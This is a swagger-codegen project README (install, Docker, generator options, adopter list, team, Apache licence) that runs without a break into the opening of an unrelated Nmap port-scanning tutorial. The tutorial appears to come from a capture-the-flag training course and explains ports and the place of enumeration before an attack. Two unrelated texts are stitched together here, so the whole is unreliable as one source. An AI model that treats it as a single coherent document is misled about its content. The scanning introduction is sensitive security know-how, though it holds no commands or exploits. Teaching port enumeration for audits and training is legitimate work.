OpenAPI Specification has undergone 3 revisions since initial creation in 2010. The swagger-codegen project has the following compatibilities with the OpenAPI Specification: Swagger Codegen Version | Release Date | OpenAPI Spec compatibility | Notes -------------------------- | ------------ | -------------------------- | ----- 2.3.0 (upcoming minor release) | Apr/May 2017 | 1.0, 1.1, 1.2, 2.0 | Minor release with breaking changes 2.2.3 (upcoming patch release) | TBD | 1.0, 1.1, 1.2, 2.0 | Patch release without breaking changes [2.2.2](https://github.com/swagger-api/swagger-codegen/releases/tag/v2.2.2) (**current stable**) | 2017-03-01 | 1.0, 1.1, 1.2, 2.0 | [tag v2.2.2](https://github.com/swagger-api/swagger-codegen/tree/v2.2.2) [2.2.1](https://github.com/swagger-api/swagger-codegen/releases/tag/v2.2.1) | 2016-08-07 | 1.0, 1.1, 1.2, 2.0 | [tag v2.2.1](https://github.com/swagger-api/swagger-codegen/tree/v2.2.1) [2.1.6](https://github.com/swagger-api/swagger-codegen/releases/tag/v2.1.6) | 2016-04-06 | 1.0, 1.1, 1.2, 2.0 | [tag v2.1.6](https://github.com/swagger-api/swagger-codegen/tree/v2.1.6) 2.0.17 | 2014-08-22 | 1.1, 1.2 | [tag v2.0.17](https://github.com/swagger-api/swagger-codegen/tree/v2.0.17) 1.0.4 | 2012-04-12 | 1.0, 1.1 | [tag v1.0.4](https://github.com/swagger-api/swagger-codegen/tree/swagger-codegen_2.9.1-1.1) ### Prerequisites If you're looking for the latest stable version, you can grab it directly from Maven.org (Java 7 runtime at a minimum): ``` wget http://central.maven.org/maven2/io/swagger/swagger-codegen-cli/2.2.2/swagger-codegen-cli-2.2.2.jar -O swagger-codegen-cli.jar java -jar swagger-codegen-cli.jar help ``` On a mac, it's even easier with `brew`: ``` brew install swagger-codegen ``` To build from source, you need the following installed and available in your $PATH: * [Java 7 or 8](http://java.oracle.com) * [Apache maven 3.3.3 or greater](http://maven.apache.org/) #### OS X Users Don't forget to install Java 7 or 8. You probably have 1.6. Export JAVA_HOME in order to use the supported Java version: ``` export JAVA_HOME=`/usr/libexec/java_home -v 1.8` export PATH=${JAVA_HOME}/bin:$PATH ``` ### Building After cloning the project, you can build it from source with this command: ``` mvn clean package ``` ### Homebrew To install, run `brew install swagger-codegen` Here is an example usage: ``` swagger-codegen generate -i http://petstore.swagger.io/v2/swagger.json -l ruby -o /tmp/test/ ``` ### Docker #### Development in docker You can use `run-in-docker.sh` to do all development. This script maps your local repository to `/gen` in the docker container. It also maps `~/.m2/repository` to the appropriate container location. To execute `mvn package`: ``` git clone https://github.com/swagger-api/swagger-codegen cd swagger-codegen ./run-in-docker.sh mvn package ``` Build artifacts are now accessible in your working directory. Once built, `run-in-docker.sh` will act as an executable for swagger-codegen-cli. To generate code, you'll need to output to a directory under `/gen` (e.g. `/gen/out`). For example: ``` ./run-in-docker.sh help # Executes 'help' command for swagger-codegen-cli ./run-in-docker.sh langs # Executes 'langs' command for swagger-codegen-cli ./run-in-docker.sh /gen/bin/go-petstore.sh # Builds the Go client ./run-in-docker.sh generate -i modules/swagger-codegen/src/test/resources/2_0/petstore.yaml \ -l go -o /gen/out/go-petstore -DpackageName=petstore # generates go client, outputs locally to ./out/go-petstore ``` #### Run Docker in Vagrant Prerequisite: install [Vagrant](https://www.vagrantup.com/downloads.html) and [VirtualBox](https://www.virtualbox.org/wiki/Downloads). ``` git clone http://github.com/swagger-api/swagger-codegen.git cd swagger-codegen vagrant up vagrant ssh cd /vagrant ./run-in-docker.sh mvn package ``` #### Public Pre-built Docker images - https://hub.docker.com/r/swaggerapi/swagger-generator/ (official web service) - https://hub.docker.com/r/swaggerapi/swagger-codegen-cli/ (official CLI) ##### Swagger Generator Docker Image The Swagger Generator image can act as a self-hosted web application and API for generating code. This container can be incorporated into a CI pipeline, and requires at least two HTTP requests and some docker orchestration to access generated code. Example usage (note this assumes `jq` is installed for command line processing of JSON): ``` # Start container and save the container id CID=$(docker run -d swaggerapi/swagger-generator) # allow for startup sleep 5 # Get the IP of the running container GEN_IP=$(docker inspect --format '{{.NetworkSettings.IPAddress}}' $CID) # Execute an HTTP request and store the download link RESULT=$(curl -X POST --header 'Content-Type: application/json' --header 'Accept: application/json' -d '{ "swaggerUrl": "http://petstore.swagger.io/v2/swagger.json" }' 'http://localhost:8188/api/gen/clients/javascript' | jq '.link' | tr -d '"') # Download the generated zip and redirect to a file curl $RESULT > result.zip # Shutdown the swagger generator image docker stop $CID && docker rm $CID ``` In the example above, `result.zip` will contain the generated client. ##### Swagger Codegen CLI Docker Image The Swagger Codegen image acts as a standalone executable. It can be used as an alternative to installing via homebrew, or for developers who are unable to install Java or upgrade the installed version. To generate code with this image, you'll need to mount a local location as a volume. Example: ``` docker run --rm -v ${PWD}:/local swaggerapi/swagger-codegen-cli generate \ -i http://petstore.swagger.io/v2/swagger.json \ -l go \ -o /local/out/go ``` The generated code will be located under `./out/go` in the current directory. ## Getting Started To generate a PHP client for http://petstore.swagger.io/v2/swagger.json, please run the following ```sh git clone https://github.com/swagger-api/swagger-codegen cd swagger-codegen mvn clean package java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar generate \ -i http://petstore.swagger.io/v2/swagger.json \ -l php \ -o /var/tmp/php_api_client ``` (if you're on Windows, replace the last command with `java -jar modules\swagger-codegen-cli\target\swagger-codegen-cli.jar generate -i http://petstore.swagger.io/v2/swagger.json -l php -o c:\temp\php_api_client`) You can also download the JAR (latest release) directly from [maven.org](http://central.maven.org/maven2/io/swagger/swagger-codegen-cli/2.2.2/swagger-codegen-cli-2.2.2.jar) To get a list of **general** options available, please run `java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar help generate` To get a list of PHP specified options (which can be passed to the generator with a config file via the `-c` option), please run `java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar config-help -l php` ## Generators ### To generate a sample client library You can build a client against the swagger sample [petstore](http://petstore.swagger.io) API as follows: ``` ./bin/java-petstore.sh ``` (On Windows, run `.\bin\windows\java-petstore.bat` instead) This will run the generator with this command: ``` java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar generate \ -i http://petstore.swagger.io/v2/swagger.json \ -l java \ -o samples/client/petstore/java ``` with a number of options. You can get the options with the `help generate` command (below only shows partal results): ``` NAME swagger-codegen-cli generate - Generate code with chosen lang SYNOPSIS swagger-codegen-cli generate [(-a <authorization> | --auth <authorization>)] [--additional-properties <additional properties>] [--api-package <api package>] [--artifact-id <artifact id>] [--artifact-version <artifact version>] [(-c <configuration file> | --config <configuration file>)] [-D <system properties>] [--group-id <group id>] (-i <spec file> | --input-spec <spec file>) [--import-mappings <import mappings>] [--instantiation-types <instantiation types>] [--invoker-package <invoker package>] (-l <language> | --lang <language>) [--language-specific-primitives <language specific primitives>] [--library <library>] [--model-package <model package>] [(-o <output directory> | --output <output directory>)] [(-s | --skip-overwrite)] [(-t <template directory> | --template-dir <template directory>)] [--type-mappings <type mappings>] [(-v | --verbose)] OPTIONS -a <authorization>, --auth <authorization> adds authorization headers when fetching the swagger definitions remotely. Pass in a URL-encoded string of name:header with a comma separating multiple values ...... (results omitted) -v, --verbose verbose mode ``` You can then compile and run the client, as well as unit tests against it: ``` cd samples/client/petstore/java mvn package ``` Other languages have petstore samples, too: ``` ./bin/android-petstore.sh ./bin/java-petstore.sh ./bin/objc-petstore.sh ``` ### Generating libraries from your server It's just as easy--just use the `-i` flag to point to either a server or file. ### Modifying the client library format Don't like the default swagger client syntax? Want a different language supported? No problem! Swagger codegen processes mustache templates with the [jmustache](https://github.com/samskivert/jmustache) engine. You can modify our templates or make your own. You can look at `modules/swagger-codegen/src/main/resources/${your-language}` for examples. To make your own templates, create your own files and use the `-t` flag to specify your template folder. It actually is that easy. ### Making your own codegen modules If you're starting a project with a new language and don't see what you need, swagger-codegen can help you create a project to generate your own libraries: ``` java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar meta \ -o output/myLibrary -n myClientCodegen -p com.my.company.codegen ``` This will write, in the folder `output/myLibrary`, all the files you need to get started, including a README.md. Once modified and compiled, you can load your library with the codegen and generate clients with your own, custom-rolled logic. You would then compile your library in the `output/myLibrary` folder with `mvn package` and execute the codegen like such: ``` java -cp output/myLibrary/target/myClientCodegen-swagger-codegen-1.0.0.jar:modules/swagger-codegen-cli/target/swagger-codegen-cli.jar io.swagger.codegen.SwaggerCodegen ``` For Windows users, you will need to use `;` instead of `:` in the classpath, e.g. ``` java -cp output/myLibrary/target/myClientCodegen-swagger-codegen-1.0.0.jar;modules/swagger-codegen-cli/target/swagger-codegen-cli.jar io.swagger.codegen.SwaggerCodegen ``` Note the `myClientCodegen` is an option now, and you can use the usual arguments for generating your library: ``` java -cp output/myLibrary/target/myClientCodegen-swagger-codegen-1.0.0.jar:modules/swagger-codegen-cli/target/swagger-codegen-cli.jar \ io.swagger.codegen.SwaggerCodegen generate -l myClientCodegen\ -i http://petstore.swagger.io/v2/swagger.json \ -o myClient ``` ### Where is Javascript??? See our [javascript library](http://github.com/swagger-api/swagger-js)--it's completely dynamic and doesn't require static code generation. There is a third-party component called [swagger-js-codegen](https://github.com/wcandillon/swagger-js-codegen) that can generate angularjs or nodejs source code from a OpenAPI Specification. :exclamation: On Dec 7th 2015, a Javascript API client generator has been added by @jfiala. ### Generating a client from local files If you don't want to call your server, you can save the OpenAPI Spec files into a directory and pass an argument to the code generator like this: ``` -i ./modules/swagger-codegen/src/test/resources/2_0/petstore.json ``` Great for creating libraries on your ci server, from the [Swagger Editor](http://editor.swagger.io)... or while coding on an airplane. ### Selective generation You may not want to generate *all* models in your project. Likewise you may want just one or two apis to be written. If that's the case, you can use system properties to control the output: The default is generate *everything* supported by the specific library. Once you enable a feature, it will restrict the contents generated: ``` # generate only models java -Dmodels {opts} # generate only apis java -Dapis {opts} # generate only supporting files java -DsupportingFiles # generate models and supporting files java -Dmodels -DsupportingFiles ``` To control the specific files being generated, you can pass a CSV list of what you want: ``` # generate the User and Pet models only -Dmodels=User,Pet # generate the User model and the supportingFile `StringUtil.java`: -Dmodels=User -DsupportingFiles=StringUtil.java ``` To control generation of docs and tests for api and models, pass false to the option. For api, these options are `-DapiTests=false` and `-DapiDocs=false`. For models, `-DmodelTests=false` and `-DmodelDocs=false`. These options default to true and don't limit the generation of the feature options listed above (like `-Dapi`): ``` # generate only models (with tests and documentation) java -Dmodels {opts} # generate only models (with tests but no documentation) java -Dmodels -DmodelDocs=false {opts} # generate only User and Pet models (no tests and no documentation) java -Dmodels=User,Pet -DmodelTests=false {opts} # generate only apis (without tests) java -Dapis -DapiTests=false {opts} # generate only apis (modelTests option is ignored) java -Dapis -DmodelTests=false {opts} ``` When using selective generation, _only_ the templates needed for the specific generation will be used. ### Ignore file format Swagger codegen supports a `.swagger-codegen-ignore` file, similar to `.gitignore` or `.dockerignore` you're probably already familiar with. The ignore file allows for better control over overwriting existing files than the `--skip-overwrite` flag. With the ignore file, you can specify individual files or directories can be ignored. This can be useful, for example if you only want a subset of the generated code. Examples: ``` # Swagger Codegen Ignore # Lines beginning with a # are comments # This should match build.sh located anywhere. build.sh # Matches build.sh in the root /build.sh # Exclude all recursively docs/** # Explicitly allow files excluded by other rules !docs/UserApi.md # Recursively exclude directories named Api # You can't negate files below this directory. src/**/Api/ # When this file is nested under /Api (excluded above), # this rule is ignored because parent directory is excluded by previous rule. !src/**/PetApiTests.cs # Exclude a single, nested file explicitly src/IO.Swagger.Test/Model/AnimalFarmTests.cs ``` The `.swagger-codegen-ignore` file must exist in the root of the output directory. ### Customizing the generator There are different aspects of customizing the code generator beyond just creating or modifying templates. Each language has a supporting configuration file to handle different type mappings, etc: ``` $ ls -1 modules/swagger-codegen/src/main/java/io/swagger/codegen/languages/ AbstractJavaJAXRSServerCodegen.java AbstractTypeScriptClientCodegen.java ... (results omitted) TypeScriptAngularClientCodegen.java TypeScriptNodeClientCodegen.java ``` Each of these files creates reasonable defaults so you can get running quickly. But if you want to configure package names, prefixes, model folders, etc. you can use a json config file to pass the values. ``` java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar generate \ -i http://petstore.swagger.io/v2/swagger.json \ -l java \ -o samples/client/petstore/java \ -c path/to/config.json ``` and `config.json` contains the following as an example: ``` { "apiPackage" : "petstore" } ``` Supported config options can be different per language. Running `config-help -l {lang}` will show available options. **These options are applied via configuration file (e.g. config.json) or by passing them with `-D{optionName}={optionValue}`**. (If `-D{optionName}` does not work, please open a [ticket](https://github.com/swagger-api/swagger-codegen/issues/new) and we'll look into it) ``` java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar config-help -l java ``` Output ``` CONFIG OPTIONS modelPackage package for generated models apiPackage package for generated api classes ...... (results omitted) library library template (sub-template) to use: jersey1 - HTTP client: Jersey client 1.18. JSON processing: Jackson 2.4.2 jersey2 - HTTP client: Jersey client 2.6 feign - HTTP client: Netflix Feign 8.1.1. JSON processing: Jackson 2.6.3 okhttp-gson (default) - HTTP client: OkHttp 2.4.0. JSON processing: Gson 2.3.1 retrofit - HTTP client: OkHttp 2.4.0. JSON processing: Gson 2.3.1 (Retrofit 1.9.0) retrofit2 - HTTP client: OkHttp 2.5.0. JSON processing: Gson 2.4 (Retrofit 2.0.0-beta2) ``` Your config file for Java can look like ```json { "groupId":"com.my.company", "artifactId":"MyClient", "artifactVersion":"1.2.0", "library":"feign" } ``` For all the unspecified options default values will be used. Another way to override default options is to extend the config class for the specific language. To change, for example, the prefix for the Objective-C generated files, simply subclass the ObjcClientCodegen.java: ```java package com.mycompany.swagger.codegen; import io.swagger.codegen.languages.*; public class MyObjcCodegen extends ObjcClientCodegen { static { PREFIX = "HELO"; } } ``` and specify the `classname` when running the generator: ``` -l com.mycompany.swagger.codegen.MyObjcCodegen ``` Your subclass will now be loaded and overrides the `PREFIX` value in the superclass. ### Bringing your own models Sometimes you don't want a model generated. In this case, you can simply specify an import mapping to tell the codegen what _not_ to create. When doing this, every location that references a specific model will refer back to your classes. Note, this may not apply to all languages... To specify an import mapping, use the `--import-mappings` argument and specify the model-to-import logic as such: ``` --import-mappings Pet=my.models.MyPet ``` Or for multiple mappings: ``` Pet=my.models.MyPet,Order=my.models.MyOrder ``` ### Validating your OpenAPI Spec You have options. The easiest is to use our [online validator](https://github.com/swagger-api/validator-badge) which not only will let you validate your spec, but with the debug flag, you can see what's wrong with your spec. For example: http://online.swagger.io/validator/debug?url=http://petstore.swagger.io/v2/swagger.json ### Generating dynamic html api documentation To do so, just use the `-l dynamic-html` flag when reading a spec file. This creates HTML documentation that is available as a single-page application with AJAX. To view the documentation: ``` cd samples/dynamic-html/ npm install node . ``` Which launches a node.js server so the AJAX calls have a place to go. ### Generating static html api documentation To do so, just use the `-l html` flag when reading a spec file. This creates a single, simple HTML file with embedded css so you can ship it as an email attachment, or load it from your filesystem: ``` cd samples/html/ open index.html ``` ### To build a server stub Please refer to https://github.com/swagger-api/swagger-codegen/wiki/Server-stub-generator-HOWTO for more information. ### To build the codegen library This will create the swagger-codegen library from source. ``` mvn package ``` Note! The templates are included in the library generated. If you want to modify the templates, you'll need to either repackage the library OR specify a path to your scripts ## Workflow integration You can use the [swagger-codegen-maven-plugin](modules/swagger-codegen-maven-plugin/README.md) for integrating with your workflow, and generating any codegen target. ## GitHub Integration To push the auto-generated SDK to GitHub, we provide `git_push.sh` to streamline the process. For example: 1) Create a new repository in GitHub (Ref: https://help.github.com/articles/creating-a-new-repository/) 2) Generate the SDK ``` java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar generate \ -i modules/swagger-codegen/src/test/resources/2_0/petstore.json -l perl \ --git-user-id "wing328" \ --git-repo-id "petstore-perl" \ --release-note "Github integration demo" \ -o /var/tmp/perl/petstore ``` 3) Push the SDK to GitHub ``` cd /var/tmp/perl/petstore /bin/sh ./git_push.sh ``` ## Online generators One can also generate API client or server using the online generators (https://generator.swagger.io) For example, to generate Ruby API client, simply send the following HTTP request using curl: ``` curl -X POST -H "content-type:application/json" -d '{"swaggerUrl":"http://petstore.swagger.io/v2/swagger.json"}' https://generator.swagger.io/api/gen/clients/ruby ``` Then you will receieve a JSON response with the URL to download the zipped code. To customize the SDK, you can `POST` to `https://generator.swagger.io/gen/clients/{language}` with the following HTTP body: ``` { "options": {}, "swaggerUrl": "http://petstore.swagger.io/v2/swagger.json" } ``` in which the `options` for a language can be obtained by submitting a `GET` request to `https://generator.swagger.io/api/gen/clients/{language}`: For example, `curl https://generator.swagger.io/api/gen/clients/python` returns ``` { "packageName":{ "opt":"packageName", "description":"python package name (convention: snake_case).", "type":"string", "default":"swagger_client" }, "packageVersion":{ "opt":"packageVersion", "description":"python package version.", "type":"string", "default":"1.0.0" }, "sortParamsByRequiredFlag":{ "opt":"sortParamsByRequiredFlag", "description":"Sort method arguments to place required parameters before optional parameters.", "type":"boolean", "default":"true" } } ``` To set package name to `pet_store`, the HTTP body of the request is as follows: ``` { "options": { "packageName": "pet_store" }, "swaggerUrl": "http://petstore.swagger.io/v2/swagger.json" } ``` and here is the curl command: ``` curl -H "Content-type: application/json" -X POST -d '{"options": {"packageName": "pet_store"},"swaggerUrl": "http://petstore.swagger.io/v2/swagger.json"}' https://generator.swagger.io/api/gen/clients/python ``` Instead of using `swaggerUrl` with an URL to the OpenAPI/Swagger spec, one can include the spec in the JSON payload with `spec`, e.g. ``` { "options": {}, "spec": { "swagger": "2.0", "info": { "version": "1.0.0", "title": "Test API" }, ... } } ``` Guidelines for Contribution --------------------------- Please refer to this [page](https://github.com/swagger-api/swagger-codegen/blob/master/CONTRIBUTING.md) Companies/Projects using Swagger Codegen ---------------------------------------- Here are some companies/projects using Swagger Codegen in production. To add your company/project to the list, please visit [README.md](https://github.com/swagger-api/swagger-codegen/blob/master/README.md) and click on the icon to edit the page. - [Activehours](https://www.activehours.com/) - [Acunetix](https://www.acunetix.com/) - [Atlassian](https://www.atlassian.com/) - [Autodesk](http://www.autodesk.com/) - [Avenida Compras S.A.](https://www.avenida.com.ar) - [AYLIEN](http://aylien.com/) - [Balance Internet](https://www.balanceinternet.com.au/) - [beemo](http://www.beemo.eu) - [bitly](https://bitly.com) - [Bufferfly Network](https://www.butterflynetinc.com/) - [Cachet Financial](http://www.cachetfinancial.com/) - [carpolo](http://www.carpolo.co/) - [CloudBoost](https://www.CloudBoost.io/) - [Conplement](http://www.conplement.de/) - [Cummins](http://www.cummins.com/) - [Cupix](http://www.cupix.com) - [DBBest Technologies](https://www.dbbest.com) - [DecentFoX](http://decentfox.com/) - [DocRaptor](https://docraptor.com) - [DocuSign](https://www.docusign.com) - [Ergon](http://www.ergon.ch/) - [EMC](https://www.emc.com/) - [eureka](http://eure.jp/) - [everystory.us](http://everystory.us) - [Expected Behavior](http://www.expectedbehavior.com/) - [Fastly](https://www.fastly.com/) - [Flat](https://flat.io) - [Finder](http://en.finder.pl/) - [FH Münster - University of Applied Sciences](http://www.fh-muenster.de) - [Fotition](https://www.fotition.com/) - [Gear Zero Network](https://www.gearzero.ca) - [Germin8](http://www.germin8.com) - [GigaSpaces](http://www.gigaspaces.com) - [goTransverse](http://www.gotransverse.com/api) - [GraphHopper](https://graphhopper.com/) - [Gravitate Solutions](http://gravitatesolutions.com/) - [HashData](http://www.hashdata.cn/) - [Hewlett Packard Enterprise](https://hpe.com) - [High Technologies Center](http://htc-cs.com) - [IBM](https://www.ibm.com) - [IMS Health](http://www.imshealth.com/en/solution-areas/technology-and-applications) - [Individual Standard IVS](http://www.individual-standard.com) - [Intent HQ](http://www.intenthq.com) - [Interactive Intelligence](http://developer.mypurecloud.com/) - [Kabuku](http://www.kabuku.co.jp/en) - [Kurio](https://kurio.co.id) - [Kuroi](http://kuroiwebdesign.com/) - [Kuary](https://kuary.com/) - [Kubernetes](https://kubernetes.io/) - [LANDR Audio](https://www.landr.com/) - [Lascaux](http://www.lascaux.it/) - [Leica Geosystems AG](http://leica-geosystems.com) - [LiveAgent](https://www.ladesk.com/) - [LXL Tech](http://lxltech.com) - [Lyft](https://www.lyft.com/developers) - [MailMojo](https://mailmojo.no/) - [Mindera](http://mindera.com/) - [Mporium](http://mporium.com/) - [Neverfail](https://neverfail.com/) - [nViso](http://www.nviso.ch/) - [Okiok](https://www.okiok.com) - [Onedata](http://onedata.org) - [OrderCloud.io](http://ordercloud.io) - [OSDN](https://osdn.jp) - [PagerDuty](https://www.pagerduty.com) - [PagerTree](https://pagertree.com) - [Pepipost](https://www.pepipost.com) - [Plexxi](http://www.plexxi.com) - [Pixoneye](http://www.pixoneye.com/) - [PostAffiliatePro](https://www.postaffiliatepro.com/) - [PracticeBird](https://www.practicebird.com/) - [Prill Tecnologia](http://www.prill.com.br) - [QAdept](http://qadept.com/) - [QuantiModo](https://quantimo.do/) - [QuickBlox](https://quickblox.com/) - [Rapid7](https://rapid7.com/) - [Reload! A/S](https://reload.dk/) - [REstore](https://www.restore.eu) - [Revault Sàrl](http://revault.ch) - [Riffyn](https://riffyn.com) - [Royal Bank of Canada (RBC)](http://www.rbc.com/canada.html) - [Saritasa](https://www.saritasa.com/) - [SCOOP Software GmbH](http://www.scoop-software.de) - [Shine Solutions](https://shinesolutions.com/) - [Simpfony](https://www.simpfony.com/) - [Skurt](http://www.skurt.com) - [Slamby](https://www.slamby.com/) - [SmartRecruiters](https://www.smartrecruiters.com/) - [snapCX](https://snapcx.io) - [SPINEN](http://www.spinen.com) - [SRC](https://www.src.si/) - [Stingray](http://www.stingray.com) - [StyleRecipe](http://stylerecipe.co.jp) - [Svenska Spel AB](https://www.svenskaspel.se/) - [Switch Database](https://www.switchdatabase.com/) - [TaskData](http://www.taskdata.com/) - [ThoughtWorks](https://www.thoughtworks.com) - [Trexle](https://trexle.com/) - [Upwork](http://upwork.com/) - [uShip](https://www.uship.com/) - [VMware](https://vmware.com/) - [W.UP](http://wup.hu/?siteLang=en) - [Wealthfront](https://www.wealthfront.com/) - [Webever GmbH](https://www.webever.de/) - [WEXO A/S](https://www.wexo.dk/) - [XSky](http://www.xsky.com/) - [Zalando](https://tech.zalando.com) - [ZEEF.com](https://zeef.com/) # Swagger Codegen Core Team Swagger Codegen core team members are contributors who have been making significant contributions (review issues, fix bugs, make enhancements, etc) to the project on a regular basis. ## API Clients | Languages | Core Team (join date) | |:-------------|:-------------| | ActionScript | | | C++ | | | C# | @jimschubert (2016/05/01) | | | Clojure | @xhh (2016/05/01) | | Dart | | | Groovy | | | Go | @guohuang (2016/05/01) @neilotoole (2016/05/01) | | Java | @cbornet (2016/05/01) @xhh (2016/05/01) @epaul (2016/06/04) | | Java (Spring Cloud) | @cbornet (2016/07/19) | | NodeJS/Javascript | @xhh (2016/05/01) | | ObjC | @mateuszmackowiak (2016/05/09) | | Perl | @wing328 (2016/05/01) | | PHP | @arnested (2016/05/01) | | Python | @scottrw93 (2016/05/01) | | Ruby | @wing328 (2016/05/01) @zlx (2016/05/22) | | Scala | | | Swift | @jaz-ah (2016/05/01) @Edubits (2016/05/01) | | TypeScript (Node) | @Vrolijkx (2016/05/01) | | TypeScript (Angular1) | @Vrolijkx (2016/05/01) | | TypeScript (Angular2) | @Vrolijkx (2016/05/01) | | TypeScript (Fetch) | | ## Server Stubs | Languages | Core Team (date joined) | |:------------- |:-------------| | C# ASP.NET5 | @jimschubert (2016/05/01) | | Go Server | @guohuang (2016/06/13) | | Haskell Servant | | | Java Spring Boot | @cbornet (2016/07/19) | | Java Spring MVC | @kolyjjj (2016/05/01) @cbornet (2016/07/19) | | Java JAX-RS | | | Java Play Framework | | | NancyFX | | | NodeJS | @kolyjjj (2016/05/01) | | PHP Lumen | @abcsum (2016/05/01) | | PHP Silex | | | PHP Slim | | | Python Flask | | | Ruby Sinatra | @wing328 (2016/05/01) | | | Scala Scalatra | | | | Scala Finch | @jimschubert (2017/01/28) | ## Template Creator Here is a list of template creators: * API Clients: * Akka-Scala: @cchafer * Bash: @bkryza * C++ REST: @Danielku15 * C# (.NET 2.0): @who * C# (.NET Standard 1.3 ): @Gronsak * Clojure: @xhh * Dart: @yissachar * Elixir: @niku * Groovy: @victorgit * Go: @wing328 * Java (Feign): @davidkiss * Java (Retrofit): @0legg * Java (Retrofi2): @emilianobonassi * Java (Jersey2): @xhh * Java (okhttp-gson): @xhh * Java (RestTemplate): @nbruno * Javascript/NodeJS: @jfiala * Javascript (Closure-annotated Angular) @achew22 * JMeter @davidkiss * Perl: @wing328 * Swift: @tkqubo * Swift 3: @hexelon * TypeScript (Node): @mhardorf * TypeScript (Angular1): @mhardorf * TypeScript (Fetch): @leonyu * TypeScript (Angular2): @roni-frantchi * TypeScript (jQuery): @bherila * Server Stubs * C# ASP.NET5: @jimschubert * C# NancyFX: @mstefaniuk * Erlang Server: @galaxie * Go Server: @guohuang * Haskell Servant: @algas * Java MSF4J: @sanjeewa-malalgoda * Java Spring Boot: @diyfr * Java Undertow: @stevehu * Java Play Framework: @JFCote * JAX-RS RestEasy: @chameleon82 * JAX-RS CXF: @hiveship * JAX-RS CXF (CDI): @nickcmaynard * JAX-RS RestEasy (JBoss EAP): @jfiala * PHP Lumen: @abcsum * PHP Slim: @jfastnacht * PHP Zend Expressive (with Path Handler): @Articus * Ruby on Rails 5: @zlx * Scala Finch: @jimschubert * Documentation * HTML Doc 2: @jhitchcock * Confluence Wiki: @jhitchcock ## How to join the core team Here are the requirements to become a core team member: - rank within top 50 in https://github.com/swagger-api/swagger-codegen/graphs/contributors - to contribute, here are some good [starting points](https://github.com/swagger-api/swagger-codegen/issues?q=is%3Aopen+is%3Aissue+label%3A%22Need+community+contribution%22) - regular contributions to the project - about 3 hours per week - for contribution, it can be addressing issues, reviewing PRs submitted by others, submitting PR to fix bugs or make enhancements, etc To join the core team, please reach out to [email protected] (@wing328) for more information. To become a Template Creator, simply submit a PR for new API client (e.g. Rust, Elixir) or server stub (e.g. Ruby Grape) generator. # Swagger Codegen Evangelist Swagger Codegen Evangelist shoulders one or more of the following responsibilities: - publishes articles on the benefit of Swagger Codegen - organizes local Meetups - presents the benefits of Swagger Codegen in local Meetups or conferences - actively answers questions from others in [Github](https://github.com/swagger-api/swagger-codegen/issues), [StackOverflow](stackoverflow.com/search?q=%5Bswagger%5D) - submits PRs to improve Swagger Codegen - reviews PRs submitted by the others - ranks within top 100 in the [contributor list](https://github.com/swagger-api/swagger-codegen/graphs/contributors) If you want to be a Swagger Codegen Evangelist, please kindly apply by sending an email to [email protected] (@wing328) ### List of Swagger Codegen Evangelists - Cliffano Subagio (@cliffano from Australia joined on Dec 9, 2016) - [Building An AEM API Clients Ecosystem](http://www.slideshare.net/cliffano/building-an-aem-api-clients-ecosystem) - [Adobe Marketing Cloud Community Expo](http://blog.cliffano.com/2016/11/10/adobe-marketing-cloud-community-expo/) # License information on Generated Code The Swagger Codegen project is intended as a benefit for users of the Swagger / Open API Specification. The project itself has the [License](#license) as specified. In addition, please understand the following points: * The templates included with this project are subject to the [License](#license). * Generated code is intentionally _not_ subject to the parent project license When code is generated from this project, it shall be considered **AS IS** and owned by the user of the software. There are no warranties--expressed or implied--for generated code. You can do what you wish with it, and once generated, the code is your responsibility and subject to the licensing terms that you deem appropriate. License ------- Copyright 2017 SmartBear Software Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at [apache.org/licenses/LICENSE-2.0](http://www.apache.org/licenses/LICENSE-2.0) Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. --- <img src="http://swagger.io/wp-content/uploads/2016/02/logo.jpg"/>
####Nmap #### 1. Introduction When it comes to hacking, knowledge is power. The more knowledge you have about a target system or network, the more options you have available. This makes it imperative that proper enumeration is carried out before any exploitation attempts are made. Say we have been given an IP (or multiple IP addresses) to perform a security audit on. Before we do anything else, we need to get an idea of the “landscape” we are attacking. What this means is that we need to establish which services are running on the targets. For example, perhaps one of them is running a webserver, and another is acting as a Windows Active Directory Domain Controller. The first stage in establishing this “map” of the landscape is something called port scanning. When a computer runs a network service, it opens a networking construct called a “port” to receive the connection. Ports are necessary for making multiple network requests or having multiple services available. For example, when you load several webpages at once in a web browser, the program must have some way of determining which tab is loading which web page. This is done by establishing connections to the remote webservers using different ports on your local machine. Equally, if you want a server to be able to run more than one service (for example, perhaps you want your webserver to run both HTTP and HTTPS versions of the site), then you need some way to direct the traffic to the appropriate service. Once again, ports are the solution to this. Network connections are made between two ports – an open port listening on the server and a randomly selected port on your own computer. For example, when you connect to a web page, your computer may open port 49534 to connect to the server’s port 443. ![Nmap](https://i.imgur.com/3XAfRpI.png) As in the previous example, the diagram shows what happens when you connect to numerous websites at the same time. Your computer opens up a different, high-numbered port (at random), which it uses for all its communications with the remote server. Every computer has a total of 65535 available ports; however, many of these are registered as standard ports. For example, a HTTP Webservice can nearly always be found on port 80 of the server. A HTTPS Webservice can be found on port 443. Windows NETBIOS can be found on port 139 and SMB can be found on port 445. It is important to note; however, that especially in a CTF setting, it is not unheard of for even these standard ports to be altered, making it even more imperative that we perform appropriate enumeration on the target. If we do not know which of these ports a server has open, then we do not have a hope of successfully attacking the target; thus, it is crucial that we begin any attack with a port scan. This can be accomplished in a variety of ways – usually using a tool called nmap, which is the focus of this room. Nmap can be used to perform many different kinds of port scan – the most common of these will be introduced in upcoming tasks; however, the basic theory is this: nmap will connect to each port of the target in turn. Depending on how the port responds, it can be determined as being open, closed, or filtered (usually by a firewall). Once we know which ports are open, we can then look at enumerating which services are running on each port – either manually, or more commonly using nmap. So, why nmap? The short answer is that it's currently the industry standard for a reason: no other port scanning tool comes close to matching its functionality (although some newcomers are now matching it for speed). It is an extremely powerful tool – made even more powerful by its scripting engine which can be used to scan for vulnerabilities, and in some cases even perform the exploit directly! 